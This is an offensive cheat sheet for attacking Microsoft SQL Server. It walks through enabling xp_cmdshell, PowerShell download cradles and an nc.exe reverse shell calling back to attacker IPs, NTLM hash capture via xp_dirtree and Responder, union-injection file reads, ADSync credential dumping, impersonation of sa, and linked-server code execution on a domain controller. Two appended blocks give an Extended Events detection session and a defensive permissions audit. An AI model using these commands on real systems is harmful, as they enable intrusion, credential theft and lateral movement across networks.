# MSSQL

## Login to MSSQL Server with SQSH

```
sqsh -S $IP -U sa -P <password>

# each batch must be terminated with "go" before sqsh sends it
> EXEC sp_configure 'show advanced options',1; reconfigure
> go
> EXEC sp_configure 'xp_cmdshell',1; reconfigure
> go

> xp_cmdshell "whoami"
> go
```

Reverse shell with PowerShell:

```sql
> xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://10.10.x.y/reverse.ps1')"
> go
```

PowerShell: use a <mark style="background-color:green;">Nishang payload</mark>.

{% hint style="info" %}
MSSQL is normally registered with a Service Principal Name (SPN) in AD.
{% endhint %}

Checking the compromised computer:

```powershell
powershell -exec bypass

# import module
. .\GetUserSPN.ps1
```

Collect:

* SAMAccountName
* Service Principal Name

MSSQL auth principals:

* Builtin\Users
* sa (service account)

## Do you have valid creds?

```
mssqlclient.py manager/operator:operator@manager.htb -windows-auth

# mssqlclient.py <domain>/<user>:<pass>@<full domain> -windows-auth
```

## Enumeration for PrivEsc

### Do you have access to the machine running MSSQL?

```
sqlcmd -Q "select * from sys.databases"
sqlcmd -Q "select name,create_date from sys.databases"
```

### Using PowerUpSQL

{% embed url="<https://github.com/NetSPI/PowerUpSQL>" %}

```powershell
# download and import
PS> IEX(New-Object Net.WebClient).downloadString("http://<attacker ip>:<port>/PowerUpSQL.ps1")

# run the audit
PS> Invoke-SQLAudit -Verbose
```

## Capturing the NTLM Hash

Make sure you can call the `xp_dirtree` procedure from sqlcmd.

```
# setup responder
sudo responder -I tun0

# make the SQL server reach out to the attacker IP from inside sqlcmd
sqlcmd -Q "xp_dirtree '\\<attacker ip>\test'"
```

## MSSQL Read File

**Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission.

```sql
-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null
```

## RCE with MSSQL

```sql
EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe /c dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
EXEC xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://10.10.x.y/reverse.ps1')"
```

Reverse shell: stage a script (`power.ps1`) that drops `nc.exe` and calls back to the listener:

```powershell
# power.ps1
iwr http://10.10.16.2/nc.exe -outfile c:\windows\tasks\nc.exe;
c:\windows\tasks\nc.exe -e powershell.exe 10.10.16.2 12345
```

Then fetch and run it from MSSQL (listener on the attacker side: `rlwrap nc -lvnp 12345`):

```sql
EXECUTE AS LOGIN = 'sa';
EXEC xp_cmdshell "powershell -ep bypass iex(iwr http://10.10.16.2/power.ps1 -usebasicp)";
```

If you need to re-enable `xp_cmdshell` (disabled by default since SQL Server 2005):

```sql
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
```
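Added detection example, not part of the original notes: an Extended Events session that records every batch or RPC call touching xp_cmdshell, xp_dirtree, OPENROWSET, EXECUTE AS or sp_configure (the procedures used in the sections above), together with the login and client host that issued it. It assumes the directory `C:\XELogs` exists and is writable by the SQL Server service account; the session name `offsec_watch` is an arbitrary choice.

```sql
-- Added detection example (not from the original notes). Captures batches and RPCs that
-- reference the procedures abused above, plus who sent them and from which host.
-- Assumption: C:\XELogs exists and the SQL Server service account can write to it.
CREATE EVENT SESSION [offsec_watch] ON SERVER
ADD EVENT sqlserver.sql_batch_completed (
    ACTION (sqlserver.client_hostname, sqlserver.client_app_name,
            sqlserver.server_principal_name, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_cmdshell%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_dirtree%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%OPENROWSET%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%EXECUTE AS%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%sp_configure%')
),
-- clients such as impacket's mssqlclient.py may call extended procedures as RPCs,
-- so match on the procedure name for that path as well
ADD EVENT sqlserver.rpc_completed (
    ACTION (sqlserver.client_hostname, sqlserver.client_app_name,
            sqlserver.server_principal_name, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string([object_name], N'xp_%')
       OR sqlserver.like_i_sql_unicode_string([object_name], N'sp_configure')
)
ADD TARGET package0.event_file (SET filename = N'C:\XELogs\offsec_watch.xel')
WITH (STARTUP_STATE = ON, MAX_DISPATCH_LATENCY = 5 SECONDS);

ALTER EVENT SESSION [offsec_watch] ON SERVER STATE = START;

-- Review what was captured: when, which login, from which host, and the statement text
SELECT x.value('(event/@timestamp)[1]', 'datetime2')                                AS event_time,
       x.value('(event/action[@name="server_principal_name"]/value)[1]', 'sysname') AS login_name,
       x.value('(event/action[@name="client_hostname"]/value)[1]', 'sysname')       AS client_host,
       x.value('(event/action[@name="client_app_name"]/value)[1]', 'sysname')       AS client_app,
       x.value('(event/action[@name="sql_text"]/value)[1]', 'nvarchar(max)')        AS statement_text
FROM sys.fn_xe_file_target_read_file('C:\XELogs\offsec_watch*.xel', NULL, NULL, NULL) AS f
CROSS APPLY (SELECT CAST(f.event_data AS xml)) AS e(x)
ORDER BY event_time DESC;
```

A `sp_configure 'xp_cmdshell'` batch followed by an `xp_cmdshell` call from the same login within seconds is the sequence the earlier sections produce, so alert on that pair rather than on either event alone.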

## Is there Azure AD Connect (DCSync privileges)?

ref: <https://blog.xpnsec.com/azuread-connect-for-redteam/>

```
sqlcmd -Q "Use ADSync; select private_configuration_xml,encrypted_configuration FROM mms_management_agent"

# download the code from the reference above as decrypt.ps1 and make sure you change the Data Source
IEX(New-Object Net.WebClient).downloadString('http://<attacker ip>:<port>/decrypt.ps1')
```

## Check Ability to Impersonate User

```
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
```

```
EXECUTE AS LOGIN = 'sa';
EXEC sp_configure 'show advanced options',1; reconfigure;
EXEC sp_configure 'xp_cmdshell', 1; reconfigure;
EXEC xp_cmdshell 'powershell -c "C:\Windows\Tasks\nc.exe -e cmd 10.10.x.y 443"'
```

Impersonate dbo (database owner):

```
use msdb; EXECUTE AS USER = 'dbo';
```

Check linked servers with MSSQL:

```sql
EXEC sp_linkedservers;
-- if linked to the DC you can query across from the current SQL server

SELECT version FROM OPENQUERY("DC01", 'SELECT @@VERSION AS version');
SELECT myuser FROM OPENQUERY("DC01", 'SELECT SYSTEM_USER AS myuser');

-- execute the RCE at dc01
EXEC ('sp_configure ''show advanced options'',1; reconfigure;') AT dc01
EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT dc01
EXEC ('xp_cmdshell ''powershell -enc <base64 powershell>'' ') AT dc01
```
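Added defender-side audit, not from the original notes, that checks in one pass the conditions the impersonation and linked-server sections above (and the xp_cmdshell and BULK sections earlier) rely on. Run it as sysadmin on the instance under review; every object referenced is a built-in catalog view or function, and no names are assumed.

```sql
-- Added defensive audit (not part of the original notes). Run as sysadmin.

-- 1. Dangerous instance options: xp_cmdshell and ad hoc OPENROWSET/OPENDATASOURCE
SELECT name, value_in_use, is_dynamic
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ad Hoc Distributed Queries', 'show advanced options');

-- 2. Server-level IMPERSONATE grants: which login may become which other login.
--    major_id is the login being impersonated (class 101 = SERVER_PRINCIPAL); a grant
--    on 'sa' or any sysadmin is the privilege-escalation path shown above.
SELECT grantee.name AS grantee, target.name AS can_impersonate, p.state_desc
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON p.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals target  ON p.class_desc = 'SERVER_PRINCIPAL'
                                  AND p.major_id = target.principal_id
WHERE p.permission_name = 'IMPERSONATE';

-- 3. Linked servers with RPC OUT and the remote login each local login maps to;
--    a mapping to a remote sysadmin is what turns EXEC (...) AT <server> into RCE.
SELECT s.name AS linked_server, s.data_source, s.is_rpc_out_enabled,
       lp.name AS local_login, l.uses_self_credential, l.remote_name
FROM sys.servers s
LEFT JOIN sys.linked_logins l     ON l.server_id = s.server_id
LEFT JOIN sys.server_principals lp ON l.local_principal_id = lp.principal_id
WHERE s.is_linked = 1;

-- 4. Who holds the BULK permission needed for OPENROWSET(BULK ...) file reads
SELECT pr.name AS grantee, p.permission_name, p.state_desc
FROM sys.server_permissions p
JOIN sys.server_principals pr ON p.grantee_principal_id = pr.principal_id
WHERE p.permission_name = 'ADMINISTER BULK OPERATIONS';

-- 5. Sysadmin membership (catches a renamed sa and any group/login added later)
SELECT name, type_desc, is_disabled
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')
  AND IS_SRVROLEMEMBER('sysadmin', name) = 1;
```

Any row in sections 2 or 3 that ends at a sysadmin login, or `xp_cmdshell` with `value_in_use = 1` in section 1, is the finding to remediate first.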

Nested quoting inside MSSQL queries is error-prone, so passing the PowerShell command base64-encoded (`-enc`) is the most reliable option.

References:

* <https://www.netspi.com/blog/technical-blog/network-pentesting/hacking-sql-server-stored-procedures-part-2-user-impersonation/>
* <https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md>
